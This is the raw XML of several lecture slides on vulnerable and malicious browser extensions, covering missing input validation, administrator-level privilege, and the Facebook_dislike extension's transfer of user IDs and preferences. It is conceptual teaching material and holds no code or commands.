                <a:spcPts val="545"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="43750"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1090295" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>An</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-105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extension</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-95" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>accept</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-105" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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pages</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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and  can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-95" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>generate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>contents</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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without</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-125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any</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-14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400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>validation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306705" indent="-294005">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="580"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="43750"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="307340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Some extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>designed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-440" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="698500" lvl="1" indent="-293370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="505"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
                <a:tab pos="698500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1089660" marR="466725" lvl="2" indent="-260350">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="43750"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1090295" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Some extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>install </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>potential</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-415" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>malware  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>without notifications </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-295" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>user.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia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 marL="547370" marR="860425" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1955"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="547370" algn="l"/>
                <a:tab pos="548005" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Extensions enjoy the same privilege level as an  administrator of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="1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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>machine!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551686" y="852931"/>
            <a:ext cx="6823709" cy="5791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600" spc="-10" dirty="0"/>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="10" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="5" dirty="0"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>extensions</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="961136" y="1637029"/>
            <a:ext cx="7767955" cy="14922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5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-120" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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extension</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-90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can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-125" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>exploited</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-135" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>by  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>supplying inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>gain</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-275" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:endParaRPr sz="24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505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20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>transfer information from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-37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(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history</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>transfer information from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>local </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-29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(</a:t>
            </a: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cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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38200" y="3486150"/>
            <a:ext cx="3905250" cy="27813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05400" y="3486150"/>
            <a:ext cx="4180332" cy="2667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83</a:t>
            </a:fld>
            <a:endParaRPr dirty="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551686" y="624332"/>
            <a:ext cx="6823709" cy="5791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600" spc="-10" dirty="0"/>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="10" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="5" dirty="0"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>extensions</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993902" y="1313942"/>
            <a:ext cx="7590155" cy="2979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100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94736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900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extension </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>can also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>steal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-33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information</a:t>
            </a:r>
            <a:endParaRPr sz="19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Clr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2350">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="293370" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="1820"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94736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900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>E.g., Facebook_dislike </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extension </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>stores </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>information </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-320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objects  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(stored </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-9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disk)</a:t>
            </a:r>
            <a:endParaRPr sz="19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lr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2350">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="1820"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94736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900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-95" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extension</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-8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queries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Facebook’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-90" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-4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based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-4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on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-70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standard</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-3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900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>userid </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>preference </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>information </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>website  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>https://graph.facebook.com</a:t>
            </a:r>
            <a:endParaRPr sz="19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lr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2350">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" marR="83185" indent="-273685">
              <a:lnSpc>
                <a:spcPts val="1820"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94736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900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>After</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-95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the</a:t>
